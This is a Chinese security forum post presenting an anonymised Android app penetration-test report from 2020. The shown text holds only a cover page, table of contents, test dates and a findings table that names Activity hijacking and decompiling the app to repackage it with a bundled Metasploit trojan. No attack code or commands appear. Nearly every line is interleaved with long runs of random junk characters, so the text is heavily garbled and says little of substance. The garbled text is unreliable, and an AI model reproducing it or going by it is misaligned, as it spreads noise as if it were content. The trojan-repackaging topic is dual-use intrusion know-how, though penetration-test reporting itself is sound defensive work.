找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
返回列表 发新帖
查看: 5232|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
5 P7 ~, V/ e% P$ @! Y, n2 X( y4 l' K

6 N! \# u$ q6 Y- ` 6 }* V1 t! X5 F. `& t* M. Z
$ n% w* m9 d1 B & i+ a9 M' ^+ _9 C% N! L- j

: H; I. |- j3 g! a2 Q2 u2 g ^ S/ B$ d6 p9 j) Y# I8 e
% J, Y. f; D& A* L ; x$ x" ]0 N% H5 ]! `

: h9 x/ T. c" Q' Z, W1 k; a/ d + _/ x- P7 ?6 b- d- c, w7 O 文档编号:                ( k! @8 ~, p# T! C8 n 6 |& ?" p7 p0 H. M D3 F% m

6 r7 g/ K9 I7 G6 m# Q6 f( ^& F: x- h# E3 N & [, A. ~: q. t4 @ B* o

9 f. J7 F' K) ^ - e5 ?% T Q5 u1 D0 ] q) o+ P5 s   % g/ L1 ~, g; `2 x3 Q2 @9 P7 q. t- t( f- p: E4 P1 l9 [

# R3 B3 S/ M& {3 q: l! h+ F" k- J! A# Q; c1 R; i G' D! q) U/ e

" u6 O* |& H) @; ? / \& b0 r% `* I4 _9 L+ J* {   ' q7 f# X+ X2 c/ e- y: ~ 0 |7 t! Z; k8 l$ ?

/ Y7 r S) n: S/ H& y * ~9 ^' Z% l, X; K/ Q# X) j9 M

/ m- L1 C- ^% x/ h+ p, A- ^9 { 1 B; H; r9 d+ L: U7 c5 Y   2 K3 H7 {% Z+ H; H8 a" z 2 q" [4 ~$ V2 W' ]

& M" p$ P$ x: A4 k/ y& U$ V1 K( t. S

( Y5 X9 l' l) t! Z3 i: W) v+ Q8 Z x , v2 U7 ]* d6 B- h   % I2 ~/ H: I4 {1 a1 w+ j- q 3 E! A' Z5 Q) D. [) V) {

. H, V! ^8 w1 Y; O1 Z5 q8 ] ) s! \( J& b# [: }; F8 Y

8 c3 h3 V- A9 J( y( g # Z. @. X% L; a# d   y5 v4 Y, m& w! A/ x# K& U" N 2 a; u) a$ N" d4 I1 M% _* a$ B

! i( A- @ Y$ G 2 `9 c- U& Q6 r# ?4 [

2 Q( ^) ~4 b2 `1 G, J3 G5 V# e8 l5 U- T+ F1 Z+ y+ f: p6 j 某某某APP渗透测试 8 a2 Q( b2 N$ J, e& D6 r 0 Q7 u1 A1 m: q5 ~6 i ^" k

# _! ^. T$ U% u0 p 6 L+ [6 Q: ~, }+ x7 K( C7 S8 v( g! p* y

. W: y$ u! G3 C% F3 U$ Q 4 }% j6 K# X. H3 {$ R6 R, x5 G   9 N+ U! i& F: }" t% k: S1 f' I% @6 L+ U5 ~1 @

# ^( y2 A& @3 k- `" i. C" N* u 2 d" b( q. W/ ?' u

5 j* r: x8 e: v; P% k. D9 D4 _9 r- K0 d! a! p   : J# M3 w0 k7 P6 P0 S9 d & E9 B2 G0 h2 n1 p) D w+ J

' U4 A) X, o0 K 0 G m+ i7 J" u

9 c7 u( E o" J: E, V- h 3 z% k9 F% b& f4 X" A+ o3 x   . S. q5 v) B5 o8 H. F" c# N ; v) H# }; v8 [$ W$ F/ a9 l9 y. C

. I, n6 }1 G5 [; w# b" V$ m. B" C7 M ' L7 I, P, F% C. l

2 J4 k* _" F! o+ ]' R% R9 l+ f t- b% y8 T c2 J   # M; \% E/ d; E( U) `1 ^+ d' J( J

5 ^' z" S6 M* q) f4 E5 f6 t / v l( J$ X: {

$ E% x: l* H; h" Z1 K3 a" R4 N% Y, Q! m- W1 k3 j 技 术 报 告 , v- [! W( X+ J/ T5 q* o( s! B7 C 7 z7 K5 K! I; v. @$ U1 Q

3 O; J' x9 ~% h2 ~; a: j ! a1 A3 y% K x0 k8 |

% m$ _! L' f3 w7 R+ r, Y0 m3 K& Z/ `2 R4 S# U% p   6 m& z$ F% a! x4 y5 P, y6 T! @ 1 S3 G. O3 V) Q. P1 _ W

: w- t7 B1 w8 p1 d8 k8 R3 R# Z' y/ \ & t) V; f$ g6 g- Q: Q1 p* I8 L

: y+ [7 \* W5 O9 j - b) L$ D, a9 j$ o   . y. F' Y) P r3 s + b# `' a5 G& j0 \* \

* E/ {2 b: `1 x; ~/ F) Q # \2 x, W# ]/ `4 y2 w2 Q: o

, U) R- Q- J+ X, m * c5 `9 Z: @ }( H   " C/ w p$ B7 o$ K5 a % h* I& M% @$ w1 _5 V3 t

" P' y, \% z/ Z. v ( V; l4 y2 ^9 i; r# |; U

6 O; p/ n& j! e- I% [ & N& F& P& Z: z" {   : m3 w* H I; w' o. ^5 | 1 Z! k& Y' ?0 I, U; r% r3 ^* y2 f; o( s

9 M! `; g& z* j, z6 i8 l: f: U* S5 A3 \4 E

- Z2 p7 k/ W8 p0 y: L' P" V. x- [- i+ ?   C( n. W7 E2 O * m/ Z' i, L/ P5 r$ R4 d

: c: L1 R3 W& y+ h* k5 L3 S0 z5 R( w3 d% d

" O) a2 I7 r2 Z6 ^/ n$ T; w, K( J # h" M3 n4 C [% {: X( y   ; M! p8 s4 V9 G* d4 U* ?3 Y4 Z : n- l$ W7 U W2 B8 t& O

4 j) c/ j4 n' z+ }9 z' e+ b! O: N) A) A. ?4 a5 G8 Y/ ~6 D8 F

. K9 K2 k) S& w o3 x" L2 k " O! t1 ]* \+ J2 q/ M   + J4 [2 M9 t4 C& v0 S1 y9 n& d# b8 b1 x( P' S; t: d

- J: L) i+ S4 l# W" f' R! ?- u' G: I5 T( }* r! I/ h

- v( q! l7 K& n0 @ * \8 H2 Q' V( T. z" v   " A5 k& v; {0 u, j5 ~6 a J7 \" S" |" I) Q+ s; S

+ ~! i' m K+ Q- X4 m& w8 a3 w& g 5 z" M- M- C( |+ P L

8 S7 E( z7 r2 p + @2 ?2 o; j" r( T' Q   * R: n9 \) Q& N* z( t2 ^' |* V6 J0 l: o8 B Y! y! D7 `8 P9 B' ~ A

* L, j/ `+ Z5 Y+ T6 q- Y! r& i1 g* |8 h, q% I$ e. P5 V6 a: g1 X

$ Y4 _; ?$ o9 c6 p4 W 6 U7 }, X" y' ]8 t; Y   : }) i' n5 S1 F: m( X4 ^4 J # l, m7 I( x* ]

( k4 _: g, [$ e+ a# V6 j / W% r2 v6 Y7 \+ h

/ z6 n9 r& A2 P& |( Y 5 {, V! H; ~2 u# E% o   $ n# O; w, A3 m3 @9 P ! M2 D2 U4 M" H% ]

9 h7 |$ c2 @0 M2 L* r, w5 t 9 g. I8 C6 v# g" ]3 _* C2 F

1 n e& x. e7 G( s7 L! }- h, P) ? ! [: |/ a6 [2 r/ H# |. p4 t   9 _8 E/ M; n) K1 n 3 I2 m/ u2 q. `4 s% R0 [# G0 @

! H: v V2 R% }7 b+ E ( u) _) U0 _# } V

" W1 v1 P8 x5 y9 \! I% O ! T$ P; Q, q+ a7 [% g' a$ T   : k+ V' P% p' F, i, V0 ~ ) {" [% p; v8 A- p& t. I

$ I# J# \* ~2 w& k) w - r" y' `+ [2 n+ [' g

/ Z+ V/ t' ]7 W2 \2 b2 |' \9 h0 o) I' w   ^- V' W/ t1 Y6 |, }7 ] " w5 ^' B; I& R0 L$ u& F P: v

/ S- |+ R! I( G$ i; K 4 y6 w; N, E9 d0 y; z* @7 {6 Z1 ?

8 E& j0 o) X3 B* V' A 8 ]* A9 c! J% [ I1 B7 S' v* i- E   : E0 B2 i! D7 ? n# p ; h9 W* @" m. W- t" X

8 s% d ^$ ?1 J% u6 q " v* a; m2 K6 M+ l& \

/ N" Y3 k8 i5 f& |5 W" B/ a( x! p0 b/ t   6 P% G7 |+ r1 w) p8 q7 M8 y- V# m0 f+ ]3 @' e5 W' g6 F7 _

5 F6 w, \/ z0 |! `6 D9 K% \3 c Y " b6 z, q' v1 d; E

+ X( S p: i8 b' V8 Q* _; @: V3 q4 r5 o   ( p/ k3 _. m9 h1 ]+ D 7 f0 Y7 U2 D# U7 U! p7 B; A" N3 W) m

! u, Z0 j: A- U) p5 z% U7 ^# D: \1 n* q2 A

8 \! F% C' ]# o7 j9 `7 o4 N " A' B c; K) ?( n   - g' R& I+ C1 ~$ z. R. K1 e& K* m8 q4 {0 F3 G- a! b

( h$ v9 Q4 Y9 Z/ ~ _; H 5 [$ `* r+ F2 G% x$ Q1 T1 F/ A

1 x: ]( U( e$ ]) l6 o . m% w @9 E+ e; v 二〇二〇年 g+ v" f( E9 M0 }, j! ]1 T 9 X: s1 P. I3 w& B

. J& C; G* J5 y, ~4 ]3 C3 q# I) D( ^ 9 m6 k N- a) O7 b: U* Q
' ]# j0 T" h) X m9 A/ G# @ # J; e% f' r% _5 n9 `
( D7 Z" p) H8 R( F( d; @ 3 @! h" K4 b! L' K * A8 d& p1 E' S( k7 H" }% G 4 [- Z( y; Y% ?* t& X
3 |9 S% O9 G* e' g" l 3 Q& G" R4 P2 }" W
1 _; C2 }1 r( y: J: E/ s ) [# I }1 s1 o7 {
- Z1 `: c9 l9 ?: I: c, i; S ; ?, H7 g8 p$ S8 n: \1 H+ e . M. f2 N' v1 n+ g# G 2 s0 P9 M6 S' N7 r7 k
: c, ^0 t/ c: K ) i+ T \% ~; d

, J# \# M7 a, F! H5 n* e& w: D0 Y7 c9 f | 目 录 4 S3 h! y7 }( I! t - j: a6 {4 M$ |" Y/ S" ]

$ M; v, t$ I* V& n& E0 y) ]5 h$ V$ i0 U. [& ?1 f O4 v : a6 [! g/ `) G" O: V/ m2 D) u5 a2 J `# R/ j" Q% Y5 t: v

8 [7 E7 `2 X; s1 l" y " N2 E/ M& I, N7 ], j z+ y   - R" u, I1 l& D" |+ W# G 1 _4 h3 A0 Z$ x" _

7 f+ E3 @& |4 m* H 4 y5 y2 ~4 t* x" K0 G7 \4 ^

* {' z( `' q3 p% s: |! m$ G Z( _( P) j5 G } 1 概述... 3 ! S3 w" \ i8 ~1 [" I 6 I, x6 Q! {9 c, j5 k0 A

3 J/ }( f3 a% \3 _/ }0 C$ P 6 F% X" ?# i4 O" `

0 a/ ]5 h9 w9 k7 w3 J: ]+ L6 L $ ]1 {+ Q& N2 B, S; \$ b 1.2测试时间... 3 7 E$ D: [2 ?: |/ ]2 g; C2 ?0 ^; O T0 y 3 ] v p) @5 V8 f5 u4 n& i

$ [% Z$ K1 b' q4 U: N1 x8 O3 H % r! B/ h# o5 C3 L! g. P

0 z- T8 h0 R- P$ d& Z$ N , C0 z3 d, K3 J+ e v. `, p 1.3测试对象... 3 * O) f7 L N9 c8 T5 s8 Y' {* Q2 Q9 o" i

$ _/ g0 v- o( y# K1 J - P8 ~0 Y0 Y1 a# i8 i' F+ C% Q* B

" @" ]) n( b8 i1 V 3 h6 r( v ~. ]+ B1 k 1.4测试结果... 3 7 @( ]' r4 G- ^, x! k9 J, n6 w0 r; h/ G' m

6 @, n- ?3 d2 _9 H- M% [/ W * w2 l1 b; b+ I2 G8 L* ]% k

7 [# Y" [8 `4 G `- _/ d: z* v1 j7 U3 u$ \ 2 检测结果... 4 ! D2 [+ q! }% S l6 p9 y& C8 S : d$ N4 P# }9 y) v) `

. ]! Q' G- R' j0 |( R) b: i* v7 v/ a ! } r4 x/ G/ a- h8 v ]) L

: d5 p+ _9 @' [7 @9 g ) u$ M0 q: r8 r 2.1 某某某... 4 $ }, I! y; c6 T. ]5 L, x 7 l6 @( M' ^$ r- M4 [4 ?

' y Z. M. c- `5 s) a % m* C! p }0 o) t3 G6 k% w5 i, f

3 u6 [9 N9 w! }: `1 @: B( F% v $ ~6 Z, M& Q: t+ g5 v 2.1.1检测目标... 4 / B5 E5 N4 l" h! s 9 I5 Y4 `1 e, E

6 J: p5 c# P( w, Q9 o9 T3 Q% j6 Q w4 ?& K

/ B9 m$ V3 n( z6 i- f - a }4 h8 F. T+ I0 Q 2.1.2检测结果... 4 6 ^, |' G; p! Y$ t . p4 K$ [$ D) ~4 n

8 V; k2 R+ X4 u8 N( G: k' V6 N7 h: j+ V) q, Z. k

% V3 e* T( M* J# k) _/ L: O0 V0 |2 B& w" E' r, | 2.1.2.1. 4 5 i- X, i) T8 s/ K% y+ i* t + b9 `" v6 u1 ~

3 @. t% w$ L& L% y9 t( z 9 b7 M2 o3 N% n( v( a

/ ^2 Q5 u, m7 z# S5 L ( V) {" I) q; y 2.1.2.2. 6 0 p" Y& J+ X9 M0 ~$ d # v( u7 b. u" C. t

: ^% a/ Z' p* |0 o 4 P5 P( c* |% w) ?9 d5 o4 r

% R5 W; ~" ` d ( t1 @! S7 Y6 s) k9 F8 K V: O) |0 A/ j- A( q6 N: T8 }% v' J4 M: M! e

0 p; x+ @5 h/ p2 t3 m% I/ w( g q- U7 G - T D) `$ N/ z0 }# f$ M+ k& F9 }- I6 t( |- r
; i A/ P0 Q; {8 R- o. g" b" K ! c" v$ }1 p) B7 r7 j& ]
! b% f. X, u' Q# y) ?4 [+ p5 Q3 O% E( o( U 3 e/ f+ c; _% h' i1 m# @# d! v3 r5 ]

" G! S ^ A' P. R " {6 C2 B4 l9 D: F" v 1 概述 ) E8 i3 Q1 g; `4 w1 E7 n/ g# \9 B4 N

5 z) |6 |7 j) J+ Q* B & s7 U/ ?3 R+ w6 R6 n8 I& q

; S6 q4 F# f1 ~7 w7 J9 R3 v # g- M1 c- [' X$ q 1.2测试时间 6 Y2 w! b& n I1 \7 I4 j! p, K : r; ?! L( l( B# R+ b1 l c

7 c$ @; W$ G/ e4 _ 6 y3 o R" A/ Q/ l1 Y. ` $ I( M3 \# E0 u( Q# f6 ~5 c4 n; ?' a! I& l5 v- H: e, m( Z _% L0 g+ O+ g3 }) `: H0 A3 s7 |' V- w7 b( ^! {9 k( {- H: N; ?% b. I* K8 L1 ^4 j. O. v; F2 J" O$ w4 o6 R' x8 I8 Q) t, w4 n/ A* \8 p/ N& j# L \% [% M* w' F( a- `7 ]/ E) @- E# ^" b, R! a. q9 h, ^' H0 p8 t) X y$ i1 M4 \* J# ^7 t3 n) x2 t; K d' X# t8 _; S2 ^8 |/ U( y$ ^$ S& o8 l/ j/ R+ t3 B! X3 z0 P' o4 s7 ?+ H- o; @" J7 ?/ f& N, b# x4 L* h4 x$ h, i( P6 P& y" a* `, ]+ ?$ O7 p8 T# I q! C' T8 B2 x% g: z0 k5 _& V; Q4 d$ F8 N3 C# _/ a9 \: @& K! n6 V" [+ Z5 \. g" X6 \( R/ X' K" m g- ? R0 K0 f5 g9 |( H# ~, c9 S- G1 D3 T8 D/ z6 p& b+ Q1 q: V- G0 q+ k( g8 A, w, w( k3 d2 W; x, X- J/ h% [0 p {* _6 Y3 @
- w5 b7 n4 j7 h2 t$ @% P! Q O1 G: e, U% `# p* P7 H8 `! U, [

. V# e. H# H7 i* _/ o0 W9 S2 `! H4 u. { z, H! V 渗透测试时间 9 e6 c" {& T% f8 k0 v/ ^- x7 g' _+ [

4 M! m4 J0 Q! X. l" L 5 I7 E( `! n3 \: F. T8 Z
3 f3 t0 c( m8 v y9 A4 n* @& k( j* x) i5 K8 A

& @+ N& J; _+ q4 G9 c0 q# }+ |( q8 s+ e% p K! K7 b. y, e 起始时间 , m; z' w0 }2 H, O* U/ R# V ! B1 `/ d- G, q

* w2 a* X" l# B 8 Z3 W: h6 i' I$ [ 		2 L" N& E8 d9 ]# A% ?6 I/ U F- L' x, x$ Y; L N% n

* N# O/ Q {$ J& ~2 R" p. V7 w% [# @ 202046 % @9 o1 c/ N, Z" \2 x7 D0 r 7 t" }' H- t5 z' H9 D2 s1 v. I+ R

# A! |5 @) t# q8 R0 }% o 4 F0 b7 D* h8 ~; H7 A
$ \' r$ t+ J# j: e4 U% @. E 4 G0 f% w7 P( E' n: ]5 m

5 Y3 ]3 l; U9 ]% m' g 5 P `9 v- N: o& u 结束时间 & ~! n8 ^6 q2 o/ D1 h/ F & O Z+ U! E- |7 n

6 z" }9 m6 J7 f: h: |) I* o. h3 x9 O. P" |+ W2 \$ D& C( I 		7 W* U: g: q3 z 9 V) T& c" c+ {3 p

: c) F' a; Z5 X/ I" Z) P: g0 ?) v; w9 v1 B+ P 202049 ( m7 {5 q {6 t6 S3 }$ d" o4 @7 d" Z+ X E

: D" F( v- A8 u& A% Q3 ? . G l B1 D' ~2 X( L8 @
6 \, Y6 d5 I s $ a: Z: F) g/ n- v( K- }' `

1 z' [) W3 Y, z+ c ' u. Y. i) y" t( t# E 1.3测试对象 " A7 a e0 N$ I0 D6 O; Z " E1 ]: ?* \0 p s

; m# s, f! t" U 4 B8 l0 }0 R5 o/ F, f

9 `6 S- O _5 I0 N! p5 [( V5 I1 V / i9 T; l7 J9 N! x/ a 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 7 b7 y% d4 A/ R7 i& C/ g. z - l8 Q" ~" `! c' x* a8 J& R: I7 J& _

% {2 C3 t# X0 t6 R& s( f f 3 T# b4 R) _) V9 W

, w. ]! x7 p9 x O% b! D) T8 S. R 1-1 检测对象 * @) s) N# Z0 A4 j0 ]3 q k0 z4 |) P) c) H" Z8 _/ t& r9 h6 A7 F2 o

?4 F4 t( M1 O) U6 F5 x 1 i- s1 d s! f6 Q' V3 t. n% C & t: W! U9 O$ Z; V1 M* \" R9 h- H9 j' A+ p& }, ~; M" d/ Y; o- ^2 B! `. e$ F; b3 m, U w' L* M7 A" ~& ^* C, s/ [% {( S: r& P; G, k$ H, M- w$ u2 M- }( [2 g8 X: M: P6 I1 W2 G: f' x5 k8 V5 x3 V! r1 ?% P; M+ }. ^) \/ m* T" B& U; c3 ?& j, @+ R5 @9 c2 H4 @/ j' u7 l: H3 M+ |8 V# Q0 ~* z4 b) L$ e6 i) R: C- K' t5 N+ ? O6 }* c+ j! _# T, C% U3 U0 T9 H9 Q- d1 b; q2 n4 A; L0 |+ N1 s5 J/ F0 o1 a9 E% U3 L3 I/ ^* P" }0 s; w' ~' C; t* G8 x3 v4 A4 o. p5 c( [0 Y; I5 j e9 B* R: W3 {+ l( z: H) O& Z4 X* V/ x6 T4 [. Z4 q& f5 A1 V/ ~& n p& r% \9 ?2 X/ q- G+ p, y! [* v/ [8 M, }# L+ x) i1 [% V0 i) F$ W1 k I. a! E7 Y! o( Z5 Y9 U& r+ g/ G" e# g# \& b! N2 w* E0 p- u8 W S, z; ` l, P3 I4 r: w3 H: g9 D/ _# m p7 b# Q {: u# l# E/ P8 ?5 P% g- V9 E6 M g0 B* _$ b* |# n9 j& K
/ K9 S' V% b$ _% r ) R1 h# k5 _0 O

+ s; `# K8 y3 M- R; y5 M* E# g + n' n. r6 f, m7 b" X 序号 % @4 G+ O1 M; W- G. Z' W2 p ( v0 [: }# F2 l9 [8 x( u

$ c9 u% P$ m9 o7 c6 ] * A, P( O3 Q# a 		% l' S: c+ V' h5 i' G # e+ u' ~' M) y. Y+ `

& t+ [7 [1 [$ v" y* p8 Y# S1 I & e' h9 S) T* k4 F! \' ?% t& b 测试对象 - p) e, f% d3 g2 J! Q% s" t, W6 a5 \" k: g# H3 z( d5 t$ A- S

8 S9 g7 V: U+ W; U. r ( V" x6 W9 u7 W6 J 		- s" j$ X, r9 O0 t' w 8 ]- `! K: p8 A: ?4 p p/ L

) ~5 ~) |6 k% _+ X W( D ' P& r N+ w' c% Y+ O0 t, i 测试地址 & N5 s* `8 D6 Q- d# M& |3 z . D7 Q2 e4 V- x( t" X) G p& T

) H& [; U5 B4 [3 T% q0 g% g) i" \. w) ~" o 		' C) O5 q2 f% l7 A4 _% i 8 s( W" {2 c7 e0 o+ F

: h9 H h3 P' B/ U" R $ d" c( B2 S% F 安全漏洞 " U0 k; _( x J& @6 P' l- r! K& e. ]# D$ U

2 L q- M4 X( L, ^) v 8 G' F2 X, _: n4 d3 e
! O( ~. A& @$ M+ x3 `7 r% v3 z/ r7 Z7 e/ I. Z

2 g: v# H/ P* C) Z$ Q 9 _. p& j+ m/ L 1 - Y- _& Y |2 x, R9 ^ 6 S: S: ]2 j4 G; q/ c% v8 X

5 k T' w @* d+ } : g; C$ c7 ?* a7 ^$ l4 \7 ~ 		( T+ `" y- Q5 i6 o% |' D q- [4 l9 z- I/ H" |

" m: P5 Y- |' H" k6 k 6 _2 L0 ]/ @0 m, f+ y+ W- | 某某某安卓APP , n: z; Q( B* e4 ` 8 Q# s7 f8 |. w( u4 ^$ V" h

L C# U9 @1 F( t4 M4 H 0 ^1 H- y: M a4 _ 		; |! q$ h' l2 ^# V 6 a1 G* a/ T/ x( h! i) Y2 S- P# o

+ M% h4 M! ?. w* j& R; h, _4 y) ~ h# \( s; p2 n& A) q   % D( ]( h4 P. S9 N3 n3 N( ?. K 8 ^' V# Z7 m. x4 U8 u( F

3 ^8 o/ t, P0 b1 W; [# j / L. v- e3 T* i8 O7 J C7 C" m 		% i) g: _# F- I, @5 }, h) |: O, B$ Q/ x6 l' H9 F# ?

4 L7 F0 c# y/ S3 g+ g ! @4 P1 a: ~* A0 f F6 @$ j 2 ) }$ W2 n4 _6 I7 R' ~2 n3 D9 O% h/ k6 E- N

& T9 h) b9 ]0 n6 C! _/ T0 h# u4 U . v* @! F- e9 i
3 F; Q5 _, }$ ?8 L9 t* i- U/ T$ w, J3 Y) ]* o; _

9 S8 {- w% J( a' S- f- P& \. L4 ?& j* p- C \) J- X( _$ C 1.4测试结果 ' E: W; l: ^' K: F" }) u 7 V! k/ V7 D! E7 h6 O9 b

+ z- a" x; N( W! \5 s i4 k4 g( [9 ]8 T& ~/ e$ D" v

" M. [: C! f r' H& h * Y2 g! J' u2 Q% F3 B 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 9 ?# v3 v) j6 ~ b" V( `$ S1 m1 f' t* O, X

' B$ J) S# }* x f; G( r9 g1 t4 B; I$ Q6 K6 f; l8 M6 l

* X2 l( R, R; d4 u2 s% J7 i1 U) E: b9 S) Z4 u   1 A8 L% f4 W# O: Z9 X6 K! J, h! s 0 ^7 K1 u, u j) B( g. c9 i! w- x

* t" g X, g! l* j9 e) A2 b# ^! i; K, V
- Q' j5 g0 _, X/ }$ S- w' O# \. N4 _' T7 C( r 8 }% q/ C, W2 l/ m2 q; g' c. F+ c a" f T1 i1 T' y5 l! v% F1 _' L% C$ A: x4 [; b6 j" \( U8 {2 V( c0 v. a3 C$ Y* R6 z( S6 W) m& b, Z+ C) H+ q, a! ^) O% B" S) m8 K2 }: N3 j( S) S8 V$ Z0 P" t9 Q' l0 }4 R Y( E- Q7 m# Y+ p% t- L2 M" z2 x( x- m& j z1 E5 x) g3 N+ ?, s0 k# z! l5 T4 p: \; L S0 l9 T( S7 n3 g' z& ]. R0 S( O$ @9 |! N. S1 V9 l [7 t, c# V. x, [# j4 p$ `( Y% @" Q) M, o$ N% k# f* X( M% Q. K$ c# |- @5 r+ u4 f& _4 M$ z( K( n F$ i0 W3 @& `2 x' A5 H2 {7 r# s4 L' y: J! R" V* N( D, [+ l- G0 s9 v7 @* e' |) E$ q9 ~% p9 x t x; N$ v% m. \6 [3 a( K" B; v% L! t+ H9 s* q: B7 T- u8 Q) u9 _# T# d1 ^# O; g6 t& h) r% H) o8 z) m6 _6 E8 Y6 U8 ?! \! o2 x n" J! i3 K& b, Y2 ^" j% o/ W( b. O. p! I" h. `& C" W2 I1 c, o4 v) V v' z8 G; y( t. l, I& Z9 N, o; w( J" m& a2 K* d3 H1 Q1 B) ~, d+ R8 G& M0 c% g9 M. `3 w2 M% e6 m" d" L3 s' T6 }: w; R9 b- V: V) j$ P% j1 \4 I$ i+ t& m0 `3 Q% Z( X4 P7 x X- Z3 M3 Z4 _# B Z+ @" c% a! d6 r" n: i, N" r% u2 D( Y6 e$ w! l. ~ e/ h3 I- q$ [) \8 Y3 Y* W& `+ @4 `+ g9 t1 c+ q) U/ {0 X( S+ C7 z6 F; q$ K3 S0 Z2 U% t( H, Y$ z. L$ z5 L4 z* X8 G& g: Q8 j1 b4 Y8 h" N/ N9 Z5 e$ ~ {; ~! ~- R; [9 V, ]& _. P- B- b$ n& }8 g4 F( T( i6 M& M
1 e- A6 i$ z# B* G. ], s4 L + W9 v0 B4 e: n. r6 Y& }. `6 B1 }

6 z) R# x! x5 v3 f1 Z* h . D$ q' K* F2 r& B4 ] 序号 & Q3 |. U5 ^+ c/ i7 y7 \" K, ^: A2 N8 a( V h! e$ A

/ t* p8 x9 w v9 j ' P- u+ U4 t6 x$ v5 [ 		, R8 A5 W7 v; L( r; o+ i& \ 7 o9 ` G3 ^9 @

. B3 H/ p( b* b1 [ z . q" i" R$ `+ t! t3 V 系统名称 $ c7 @ R2 E' n( p, e # m: x1 S9 u+ G" c; W( v [7 O/ @

4 K, X8 a2 t; a5 Z1 i3 J! E' I" Z+ S9 m6 U/ {1 H 		5 o6 `8 ?8 j+ z/ D( g& Z 8 p a" ?- O( Y5 P

' A$ h$ W9 S" W" |3 I . Y5 O1 x3 u: y/ s( A R4 z 漏洞名称 ! q( J, p) k V; P! L3 I$ i( v- P( t9 o: o3 J# U

( `3 L1 Q" D, Q2 Q+ f6 T5 e( h % H$ X' i* U) g0 c4 P E 		+ l% E( ^& K' Y& W3 ]* V j 0 z+ P5 ~( T9 H( ^: w( Y0 }

* C m8 `' m) Y0 A& x / u. q n( a6 W9 f$ X 漏洞危害 5 Y2 o% k/ T: r" V/ ?5 y, r2 N3 f, \8 \0 [* ?; }; W

6 M5 h3 k8 H+ ^1 u0 H 2 |( v3 |) N2 Z" c 		& F. ~; o2 k$ K" J ! n& \& n: B# D% d* G

n9 X% e2 V' H- P* g q2 ^+ _: w/ b1 h! E 修复结果 : Q( |" r- A3 o$ e' A; V% s" a % w& W0 H8 Y6 s& b: v6 ]

2 G7 ?" q! R9 I1 d" P: l3 U' R ( j @) a0 L$ u8 h8 [% a
7 A3 ]; }. R% Q0 K, f. p" d; P) t4 ` K' i4 R1 g/ Z8 J/ t; D6 }: I& I9 @

9 W6 p+ H' g8 A) y: `- j% a ( k7 a& b6 ^, _6 l) ^; A 1 % Q7 @, q$ i. [ 9 q$ b: Y2 i O0 V9 L8 |( N2 w) J

" U" b8 }' ~ G$ j* L " z- l. Q, m+ p6 G. C$ [3 C4 B 		4 P% f5 s" V. D$ o! f* A0 n: x& |; _! C2 }/ }; g' u* p

4 Y; ^/ L+ s; U- O 1 _" Y B4 [" C 某某某某某某APP 2 P4 A7 v; J5 O* S0 C. g7 U7 F+ n # F" q3 G ~6 B7 E0 |7 H

+ Y% o. A5 M" \" [% G4 B9 c! ?, f: K. N5 j( R 		- x8 {! a/ M0 q0 F8 g3 @6 p 3 k* K0 I* A6 f% M' s+ \

' r" P2 n% E+ `5 [ 4 d( B* C6 H0 R! N Activity 劫持 / u9 v4 G0 w, w( ?; [; p5 [3 d8 Y( @) m , Q! x& G% D8 Z3 |0 ]" j% E. Y

! q' T' \ n) V3 ~% I5 K. U; Y, M( n

7 t4 `$ e5 s F: k" y: w; c, c5 m H& M/ ^, @/ @   $ {8 c$ u. \7 x! d; N$ M - m% l; u! E; Y- \! t

' q2 n+ R+ x2 j2 W8 M 7 o0 g8 Y& f5 a2 J* K7 J' u 		4 Q$ [2 l R0 J7 k7 V2 T5 a+ P- R+ a

; r1 y, h2 f% M% ^ % P5 t1 ]. d: ~4 u 7 T! K7 T/ I$ T$ D) M ! t4 ?5 ~1 c8 N; s* t( J7 T8 q

2 A3 D6 a# i( i# S1 E( b- h, Y1 k 6 C3 v7 S1 {4 T* d$ k$ @" _5 g 		" {% r1 O }: G) x, q ) f: f, R$ k4 P

' l" z% ^: D( l5 y6 @, T3 J. b* x* ?; j0 U   # k2 X3 e: t+ b7 z: _ : s1 p& r- w6 a' t; B# v( T

; @5 M5 [2 F8 S: E& ^ ( g7 T9 v6 O4 X' z; P
, u& o& F8 u. d$ _ q5 J# r 3 u0 h0 `, H" l3 d5 T

* ~' J' [% M& n: l, [ : a4 w9 o/ a" f* w. R% o% q" x 2 3 V$ E) G( }2 U" s) ] J6 d- Z8 g- x) O / I1 D( o; q$ K& E$ @% P; n: g

0 E- P' f6 O( U( s! _! R" U 8 @ m& N* D: Y9 Q! m- L0 M( J 		7 `! k$ R6 Z9 @2 t; f% M$ Q/ i e B5 C9 A, z& n: A

% S$ U4 s0 z1 b8 z e2 `# [2 I3 P# l. Y 某某某某某某APP $ c& m0 w$ ^* S8 u& U3 H* c 5 [+ E- l0 H* e5 B: }. _( C: J" k

! {0 R' }( h3 O+ K $ ^2 H7 O( d' M8 V* k5 P 		& C& P: q& X5 E+ l4 E# N+ I: e 0 X" x: A2 _) s6 @# P. H$ g

1 X9 G E7 _5 j3 h- \* q , G6 l7 `; }6 C3 @" ?$ l( S; ? 反编译二次打包捆绑木马、篡改APP代码 $ U" ]9 ^$ M, X, k . W2 q" {" N! X, _& |3 s

. Y/ Y- J/ |2 E7 b+ `- L6 }) p 4 @& l# @8 C q; J. ~ 		1 F( _1 m% D" c) [0 F# q( |" B( p* A; w& Q

4 q" t- ^7 P; G $ f% c. i% W4 l( f, {% H' |. Y& Q& f * t6 A2 r" m( a& m , J0 c" z2 H6 l, o

3 F( x f* {* t- {- Y( `4 |' g/ l" E 		8 M0 T% U; v7 _" l" U2 n" p " N. G- w) C# U/ ]% z* }. ^8 o

- w" | P: F8 F2 _: c4 ~ ' n* o" Y) R! y   9 Z; Y* V$ y* d' u 1 ?1 d& \6 D4 l( G' ]! D% a* }/ {- l

; ~2 P* m% l3 r( q6 O9 q, D7 V- U1 o% y
: C9 ~ u* y' @4 S1 y$ n+ Q 7 n9 K: D+ q0 W
7 {) d3 S" u8 E' @) |, j ) k3 `6 k' C* [

